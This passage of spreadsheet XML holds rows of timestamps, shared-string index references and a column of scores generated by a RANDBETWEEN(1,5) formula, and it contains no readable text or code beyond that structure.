        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19179" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19179" s="1">
        <v>43146.578379629631</v>
      </c>
      <c r="C19179" t="s">
        <v>1077</v>
      </c>
      <c r="D19179" t="s">
        <v>17</v>
      </c>
      <c r="E19179" s="2" t="s">
        <v>17204</v>
      </c>
      <c r="F19179">
        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19180" s="1">
        <v>43146.574895833335</v>
      </c>
      <c r="C19180" t="s">
        <v>10</v>
      </c>
      <c r="D19180" t="s">
        <v>23</v>
      </c>
      <c r="E19180" t="s">
        <v>17205</v>
      </c>
      <c r="F19180">
        <f t="shared" ca="1" si="299"/>
        <v>3</v>
      </c>
    </row>
    <row r="19181" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19181" s="1">
        <v>43146.554409722223</v>
      </c>
      <c r="C19181" t="s">
        <v>1077</v>
      </c>
      <c r="D19181" t="s">
        <v>6</v>
      </c>
      <c r="E19181" s="2" t="s">
        <v>17206</v>
      </c>
      <c r="F19181">
        <f t="shared" ca="1" si="299"/>
        <v>1</v>
      </c>
    </row>
    <row r="19182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19182" s="1">
        <v>43146.538368055553</v>
      </c>
      <c r="C19182" t="s">
        <v>10</v>
      </c>
      <c r="D19182" t="s">
        <v>163</v>
      </c>
      <c r="E19182" t="s">
        <v>17207</v>
      </c>
      <c r="F19182">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19183" s="1">
        <v>43146.53365740741</v>
      </c>
      <c r="C19183" t="s">
        <v>724</v>
      </c>
      <c r="D19183" t="s">
        <v>17</v>
      </c>
      <c r="E19183" t="s">
        <v>17208</v>
      </c>
      <c r="F19183">
        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19184" s="1">
        <v>43146.530972222223</v>
      </c>
      <c r="C19184" t="s">
        <v>721</v>
      </c>
      <c r="D19184" t="s">
        <v>721</v>
      </c>
      <c r="E19184" t="s">
        <v>17209</v>
      </c>
      <c r="F19184">
        <f t="shared" ca="1" si="299"/>
        <v>3</v>
      </c>
    </row>
    <row r="19185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19185" s="1">
        <v>43146.52443287037</v>
      </c>
      <c r="C19185" t="s">
        <v>10</v>
      </c>
      <c r="D19185" t="s">
        <v>163</v>
      </c>
      <c r="E19185" t="s">
        <v>17210</v>
      </c>
      <c r="F19185">
        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19186" s="1">
        <v>43146.520231481481</v>
      </c>
      <c r="C19186" t="s">
        <v>10</v>
      </c>
      <c r="D19186" t="s">
        <v>222</v>
      </c>
      <c r="E19186" t="s">
        <v>17211</v>
      </c>
      <c r="F19186">
        <f t="shared" ca="1" si="299"/>
        <v>5</v>
      </c>
    </row>
    <row r="19187" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19187" s="1">
        <v>43146.514791666668</v>
      </c>
      <c r="C19187" t="s">
        <v>1077</v>
      </c>
      <c r="D19187" t="s">
        <v>52</v>
      </c>
      <c r="E19187" s="2" t="s">
        <v>17212</v>
      </c>
      <c r="F19187">
        <f t="shared" ca="1" si="299"/>
        <v>3</v>
      </c>
    </row>
    <row r="19188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19188" s="1">
        <v>43146.514421296299</v>
      </c>
      <c r="C19188" t="s">
        <v>10</v>
      </c>
      <c r="D19188" t="s">
        <v>107</v>
      </c>
      <c r="E19188" t="s">
        <v>17213</v>
      </c>
      <c r="F19188">
        <f t="shared" ca="1" si="299"/>
        <v>3</v>
      </c>
    </row>
    <row r="19189" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19189" s="1">
        <v>43146.507268518515</v>
      </c>
      <c r="C19189" t="s">
        <v>173</v>
      </c>
      <c r="E19189" s="2" t="s">
        <v>17214</v>
      </c>
      <c r="F19189">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19190" s="1">
        <v>43146.506412037037</v>
      </c>
      <c r="C19190" t="s">
        <v>10</v>
      </c>
      <c r="D19190" t="s">
        <v>36</v>
      </c>
      <c r="E19190" t="s">
        <v>17215</v>
      </c>
      <c r="F19190">
        <f t="shared" ca="1" si="299"/>
        <v>5</v>
      </c>
    </row>
    <row r="19191" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19191" s="1">
        <v>43146.470196759263</v>
      </c>
      <c r="C19191" t="s">
        <v>1077</v>
      </c>
      <c r="D19191" t="s">
        <v>41</v>
      </c>
      <c r="E19191" s="2" t="s">
        <v>17216</v>
      </c>
      <c r="F19191">
        <f t="shared" ca="1" si="299"/>
        <v>5</v>
      </c>
    </row>
    <row r="19192" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19192" s="1">
        <v>43146.465648148151</v>
      </c>
      <c r="C19192" t="s">
        <v>10</v>
      </c>
      <c r="D19192" t="s">
        <v>20</v>
      </c>
      <c r="E19192" s="2" t="s">
        <v>17217</v>
      </c>
      <c r="F19192">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19193" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19193" s="1">
        <v>43146.458877314813</v>
      </c>
      <c r="C19193" t="s">
        <v>461</v>
      </c>
      <c r="E19193" s="2" t="s">
        <v>17218</v>
      </c>
      <c r="F19193">
        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19194" s="1">
        <v>43146.443668981483</v>
      </c>
      <c r="C19194" t="s">
        <v>10</v>
      </c>
      <c r="D19194" t="s">
        <v>36</v>
      </c>
      <c r="E19194" t="s">
        <v>17219</v>
      </c>
      <c r="F19194">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19195" s="1">
        <v>43146.422731481478</v>
      </c>
      <c r="C19195" t="s">
        <v>6</v>
      </c>
      <c r="D19195" t="s">
        <v>25</v>
      </c>
      <c r="E19195" t="s">
        <v>17220</v>
      </c>
      <c r="F19195">
        <f t="shared" ca="1" si="299"/>
        <v>1</v>
      </c>
    </row>
    <row r="19196" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A19196" s="1">
        <v>43146.420555555553</v>
      </c>
      <c r="C19196" t="s">
        <v>10</v>
      </c>
      <c r="D19196" t="s">
        <v>36</v>
      </c>
      <c r="E19196" s="2" t="s">
        <v>17221</v>
      </c>
      <c r="F19196">
        <f t="shared" ca="1" si="299"/>
        <v>5</v>
      </c>
    </row>
    <row r="19197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19197" s="1">
        <v>43146.392118055555</v>
      </c>
      <c r="C19197" t="s">
        <v>71</v>
      </c>
      <c r="E19197" t="s">
        <v>17222</v>
      </c>
      <c r="F19197">
        <f t="shared" ca="1" si="299"/>
        <v>5</v>
      </c>
    </row>
    <row r="19198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19198" s="1">
        <v>43146.383842592593</v>
      </c>
      <c r="C19198" t="s">
        <v>10</v>
      </c>
      <c r="D19198" t="s">
        <v>36</v>
      </c>
      <c r="E19198" t="s">
        <v>17223</v>
      </c>
      <c r="F19198">
        <f t="shared" ca="1" si="299"/>
        <v>4</v>
      </c>
    </row>
    <row r="19199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19199" s="1">
        <v>43146.362962962965</v>
      </c>
      <c r="C19199" t="s">
        <v>10</v>
      </c>
      <c r="D19199" t="s">
        <v>17</v>
      </c>
      <c r="E19199" t="s">
        <v>17224</v>
      </c>
      <c r="F19199">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19200" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19200" s="1">
        <v>43146.345752314817</v>
      </c>
      <c r="C19200" t="s">
        <v>71</v>
      </c>
      <c r="E19200" s="2" t="s">
        <v>17225</v>
      </c>
      <c r="F19200">
        <f t="shared" ca="1" si="299"/>
        <v>2</v>
      </c>
    </row>
    <row r="19201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19201" s="1">
        <v>43146.339884259258</v>
      </c>
      <c r="C19201" t="s">
        <v>48</v>
      </c>
      <c r="E19201" t="s">
        <v>17226</v>
      </c>
      <c r="F19201">
        <f t="shared" ca="1" si="299"/>
        <v>1</v>
      </c>
    </row>
    <row r="19202" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19202" s="1">
        <v>43146.333437499998</v>
      </c>
      <c r="C19202" t="s">
        <v>50</v>
      </c>
      <c r="E19202" s="2" t="s">
        <v>17227</v>
      </c>
      <c r="F19202">
        <f t="shared" ref="F19202:F19265" ca="1" si="300">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19203" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19203" s="1">
        <v>43146.321516203701</v>
      </c>
      <c r="C19203" t="s">
        <v>41</v>
      </c>
      <c r="E19203" s="2" t="s">
        <v>17228</v>
      </c>
      <c r="F19203">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19204" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19204" s="1">
        <v>43146.305520833332</v>
      </c>
      <c r="C19204" t="s">
        <v>189</v>
      </c>
      <c r="E19204" s="2" t="s">
        <v>17229</v>
      </c>
      <c r="F19204">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19205" s="1">
        <v>43146.296527777777</v>
      </c>
      <c r="C19205" t="s">
        <v>65</v>
      </c>
      <c r="E19205" t="s">
        <v>17230</v>
      </c>
      <c r="F19205">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19206" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19206" s="1">
        <v>43146.233460648145</v>
      </c>
      <c r="C19206" t="s">
        <v>48</v>
      </c>
      <c r="E19206" s="2" t="s">
        <v>17231</v>
      </c>
      <c r="F19206">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19207" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19207" s="1">
        <v>43146.216979166667</v>
      </c>
      <c r="C19207" t="s">
        <v>50</v>
      </c>
      <c r="E19207" s="2" t="s">
        <v>17232</v>
      </c>
      <c r="F19207">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19208" s="1">
        <v>43146.139918981484</v>
      </c>
      <c r="C19208" t="s">
        <v>2210</v>
      </c>
      <c r="E19208" t="s">
        <v>17233</v>
      </c>
      <c r="F19208">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19209" s="1">
        <v>43146.134687500002</v>
      </c>
      <c r="C19209" t="s">
        <v>2210</v>
      </c>
      <c r="F19209">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19210" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19210" s="1">
        <v>43146.12059027778</v>
      </c>
      <c r="C19210" t="s">
        <v>41</v>
      </c>
      <c r="E19210" s="2" t="s">
        <v>17234</v>
      </c>
      <c r="F19210">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19211" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19211" s="1">
        <v>43146.09134259259</v>
      </c>
      <c r="C19211" t="s">
        <v>1077</v>
      </c>
      <c r="D19211" t="s">
        <v>56</v>
      </c>
      <c r="E19211" s="2" t="s">
        <v>17235</v>
      </c>
      <c r="F19211">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19212" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19212" s="1">
        <v>43146.074895833335</v>
      </c>
      <c r="C19212" t="s">
        <v>2210</v>
      </c>
      <c r="D19212" t="s">
        <v>92</v>
      </c>
      <c r="E19212" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="F19212">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19213" s="1">
        <v>43146.059849537036</v>
      </c>
      <c r="C19213" t="s">
        <v>10</v>
      </c>
      <c r="D19213" t="s">
        <v>6</v>
      </c>
      <c r="E19213" t="s">
        <v>17236</v>
      </c>
      <c r="F19213">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19214" s="1">
        <v>43146.037557870368</v>
      </c>
      <c r="C19214" t="s">
        <v>318</v>
      </c>
      <c r="E19214" t="s">
        <v>17237</v>
      </c>
      <c r="F19214">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19215" s="1">
        <v>43146.00644675926</v>
      </c>
      <c r="C19215" t="s">
        <v>139</v>
      </c>
      <c r="E19215" t="s">
        <v>17238</v>
      </c>
      <c r="F19215">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19216" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A19216" s="1">
        <v>43146.003055555557</v>
      </c>
      <c r="C19216" t="s">
        <v>1408</v>
      </c>
      <c r="E19216" s="2" t="s">
        <v>15872</v>
      </c>
      <c r="F19216">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19217" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19217" s="1">
        <v>43146.003020833334</v>
      </c>
      <c r="C19217" t="s">
        <v>1077</v>
      </c>
      <c r="D19217" t="s">
        <v>229</v>
      </c>
      <c r="E19217" s="2" t="s">
        <v>17239</v>
      </c>
      <c r="F19217">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19218" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19218" s="1">
        <v>43145.984918981485</v>
      </c>
      <c r="C19218" t="s">
        <v>2210</v>
      </c>
      <c r="D19218" t="s">
        <v>1036</v>
      </c>
      <c r="E19218" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="F19218">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19219" s="1">
        <v>43145.957870370374</v>
      </c>
      <c r="C19219" t="s">
        <v>65</v>
      </c>
      <c r="E19219" t="s">
        <v>17240</v>
      </c>
      <c r="F19219">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19220" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19220" s="1">
        <v>43145.887557870374</v>
      </c>
      <c r="C19220" t="s">
        <v>10</v>
      </c>
      <c r="D19220" t="s">
        <v>14</v>
      </c>
      <c r="E19220" s="2" t="s">
        <v>17241</v>
      </c>
      <c r="F19220">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19221" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19221" s="1">
        <v>43145.857268518521</v>
      </c>
      <c r="C19221" t="s">
        <v>10</v>
      </c>
      <c r="D19221" t="s">
        <v>271</v>
      </c>
      <c r="E19221" s="2" t="s">
        <v>17242</v>
      </c>
      <c r="F19221">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19222" s="1">
        <v>43145.828993055555</v>
      </c>
      <c r="C19222" t="s">
        <v>140</v>
      </c>
      <c r="D19222" t="s">
        <v>847</v>
      </c>
      <c r="E19222" t="s">
        <v>17243</v>
      </c>
      <c r="F19222">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19223" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19223" s="1">
        <v>43145.813958333332</v>
      </c>
      <c r="C19223" t="s">
        <v>1077</v>
      </c>
      <c r="D19223" t="s">
        <v>885</v>
      </c>
      <c r="E19223" s="2" t="s">
        <v>17244</v>
      </c>
      <c r="F19223">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19224" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19224" s="1">
        <v>43145.798402777778</v>
      </c>
      <c r="C19224" t="s">
        <v>1077</v>
      </c>
      <c r="D19224" t="s">
        <v>107</v>
      </c>
      <c r="E19224" s="2" t="s">
        <v>17245</v>
      </c>
      <c r="F19224">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19225" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19225" s="1">
        <v>43145.771122685182</v>
      </c>
      <c r="C19225" t="s">
        <v>1077</v>
      </c>
      <c r="D19225" t="s">
        <v>222</v>
      </c>
      <c r="E19225" s="2" t="s">
        <v>17246</v>
      </c>
      <c r="F19225">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19226" s="1">
        <v>43145.749085648145</v>
      </c>
      <c r="C19226" t="s">
        <v>10</v>
      </c>
      <c r="D19226" t="s">
        <v>14</v>
      </c>
      <c r="E19226" t="s">
        <v>17247</v>
      </c>
      <c r="F19226">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19227" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19227" s="1">
        <v>43145.746979166666</v>
      </c>
      <c r="C19227" t="s">
        <v>1077</v>
      </c>
      <c r="D19227" t="s">
        <v>112</v>
      </c>
      <c r="E19227" s="2" t="s">
        <v>17248</v>
      </c>
      <c r="F19227">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19228" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19228" s="1">
        <v>43145.725208333337</v>
      </c>
      <c r="C19228" t="s">
        <v>10</v>
      </c>
      <c r="D19228" t="s">
        <v>6</v>
      </c>
      <c r="E19228" s="2" t="s">
        <v>17249</v>
      </c>
      <c r="F19228">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19229" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19229" s="1">
        <v>43145.705659722225</v>
      </c>
      <c r="C19229" t="s">
        <v>1077</v>
      </c>
      <c r="D19229" t="s">
        <v>1091</v>
      </c>
      <c r="E19229" s="2" t="s">
        <v>17250</v>
      </c>
      <c r="F19229">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19230" s="1">
        <v>43145.673391203702</v>
      </c>
      <c r="C19230" t="s">
        <v>124</v>
      </c>
      <c r="E19230" t="s">
        <v>17251</v>
      </c>
      <c r="F19230">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19231" s="1">
        <v>43145.66920138889</v>
      </c>
      <c r="C19231" t="s">
        <v>10</v>
      </c>
      <c r="D19231" t="s">
        <v>163</v>
      </c>
      <c r="E19231" t="s">
        <v>17252</v>
      </c>
      <c r="F19231">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19232" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19232" s="1">
        <v>43145.66883101852</v>
      </c>
      <c r="C19232" t="s">
        <v>1812</v>
      </c>
      <c r="D19232" t="s">
        <v>381</v>
      </c>
      <c r="E19232" s="2" t="s">
        <v>17253</v>
      </c>
      <c r="F19232">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19233" s="1">
        <v>43145.667604166665</v>
      </c>
      <c r="C19233" t="s">
        <v>10</v>
      </c>
      <c r="D19233" t="s">
        <v>36</v>
      </c>
      <c r="E19233" t="s">
        <v>17254</v>
      </c>
      <c r="F19233">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19234" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19234" s="1">
        <v>43145.665358796294</v>
      </c>
      <c r="C19234" t="s">
        <v>82</v>
      </c>
      <c r="E19234" s="2" t="s">
        <v>17255</v>
      </c>
      <c r="F19234">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19235" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19235" s="1">
        <v>43145.658553240741</v>
      </c>
      <c r="C19235" t="s">
        <v>1077</v>
      </c>
      <c r="D19235" t="s">
        <v>14</v>
      </c>
      <c r="E19235" s="2" t="s">
        <v>17256</v>
      </c>
      <c r="F19235">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19236" s="1">
        <v>43145.653749999998</v>
      </c>
      <c r="C19236" t="s">
        <v>10</v>
      </c>
      <c r="D19236" t="s">
        <v>192</v>
      </c>
      <c r="E19236" t="s">
        <v>17257</v>
      </c>
      <c r="F19236">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19237" s="1">
        <v>43145.640138888892</v>
      </c>
      <c r="C19237" t="s">
        <v>6</v>
      </c>
      <c r="D19237" t="s">
        <v>25</v>
      </c>
      <c r="E19237" t="s">
        <v>17258</v>
      </c>
      <c r="F19237">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19238" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19238" s="1">
        <v>43145.637673611112</v>
      </c>
      <c r="C19238" t="s">
        <v>6</v>
      </c>
      <c r="D19238" t="s">
        <v>25</v>
      </c>
      <c r="E19238" s="2" t="s">
        <v>17259</v>
      </c>
      <c r="F19238">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19239" s="1">
        <v>43145.637673611112</v>
      </c>
      <c r="C19239" t="s">
        <v>10</v>
      </c>
      <c r="D19239" t="s">
        <v>56</v>
      </c>
      <c r="E19239" t="s">
        <v>17260</v>
      </c>
      <c r="F19239">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19240" s="1">
        <v>43145.629895833335</v>
      </c>
      <c r="C19240" t="s">
        <v>10</v>
      </c>
      <c r="D19240" t="s">
        <v>46</v>
      </c>
      <c r="E19240" t="s">
        <v>17261</v>
      </c>
      <c r="F19240">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19241" s="1">
        <v>43145.60732638889</v>
      </c>
      <c r="C19241" t="s">
        <v>10</v>
      </c>
      <c r="D19241" t="s">
        <v>158</v>
      </c>
      <c r="E19241" t="s">
        <v>17262</v>
      </c>
      <c r="F19241">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19242" s="1">
        <v>43145.602951388886</v>
      </c>
      <c r="C19242" t="s">
        <v>10</v>
      </c>
      <c r="D19242" t="s">
        <v>56</v>
      </c>
      <c r="E19242" t="s">
        <v>17263</v>
      </c>
      <c r="F19242">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19243" s="1">
        <v>43145.591157407405</v>
      </c>
      <c r="C19243" t="s">
        <v>10</v>
      </c>
      <c r="D19243" t="s">
        <v>36</v>
      </c>
      <c r="E19243" t="s">
        <v>17264</v>
      </c>
      <c r="F19243">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19244" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19244" s="1">
        <v>43145.582962962966</v>
      </c>
      <c r="C19244" t="s">
        <v>2210</v>
      </c>
      <c r="D19244" t="s">
        <v>1993</v>
      </c>
      <c r="E19244" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="F19244">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19245" s="1">
        <v>43145.576886574076</v>
      </c>
      <c r="C19245" t="s">
        <v>10</v>
      </c>
      <c r="D19245" t="s">
        <v>263</v>
      </c>
      <c r="E19245" t="s">
        <v>17265</v>
      </c>
      <c r="F19245">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19246" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19246" s="1">
        <v>43145.571435185186</v>
      </c>
      <c r="C19246" t="s">
        <v>41</v>
      </c>
      <c r="E19246" s="2" t="s">
        <v>17266</v>
      </c>
      <c r="F19246">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19247" s="1">
        <v>43145.562858796293</v>
      </c>
      <c r="C19247" t="s">
        <v>10</v>
      </c>
      <c r="D19247" t="s">
        <v>36</v>
      </c>
      <c r="E19247" t="s">
        <v>17267</v>
      </c>
      <c r="F19247">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19248" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19248" s="1">
        <v>43145.561527777776</v>
      </c>
      <c r="C19248" t="s">
        <v>836</v>
      </c>
      <c r="D19248" t="s">
        <v>11</v>
      </c>
      <c r="E19248" s="2" t="s">
        <v>17268</v>
      </c>
      <c r="F19248">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19249" s="1">
        <v>43145.54483796296</v>
      </c>
      <c r="C19249" t="s">
        <v>10</v>
      </c>
      <c r="D19249" t="s">
        <v>46</v>
      </c>
      <c r="E19249" t="s">
        <v>17269</v>
      </c>
      <c r="F19249">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19250" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19250" s="1">
        <v>43145.542280092595</v>
      </c>
      <c r="C19250" t="s">
        <v>48</v>
      </c>
      <c r="E19250" s="2" t="s">
        <v>17270</v>
      </c>
      <c r="F19250">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19251" s="1">
        <v>43145.532997685186</v>
      </c>
      <c r="C19251" t="s">
        <v>10</v>
      </c>
      <c r="D19251" t="s">
        <v>36</v>
      </c>
      <c r="E19251" t="s">
        <v>17271</v>
      </c>
      <c r="F19251">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19252" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19252" s="1">
        <v>43145.526261574072</v>
      </c>
      <c r="C19252" t="s">
        <v>836</v>
      </c>
      <c r="D19252" t="s">
        <v>821</v>
      </c>
      <c r="E19252" s="2" t="s">
        <v>17272</v>
      </c>
      <c r="F19252">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19253" s="1">
        <v>43145.511203703703</v>
      </c>
      <c r="C19253" t="s">
        <v>10</v>
      </c>
      <c r="D19253" t="s">
        <v>6</v>
      </c>
      <c r="E19253" t="s">
        <v>17273</v>
      </c>
      <c r="F19253">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19254" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19254" s="1">
        <v>43145.498611111114</v>
      </c>
      <c r="C19254" t="s">
        <v>71</v>
      </c>
      <c r="E19254" s="2" t="s">
        <v>17274</v>
      </c>
      <c r="F19254">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19255" s="1">
        <v>43145.495682870373</v>
      </c>
      <c r="C19255" t="s">
        <v>10</v>
      </c>
      <c r="D19255" t="s">
        <v>46</v>
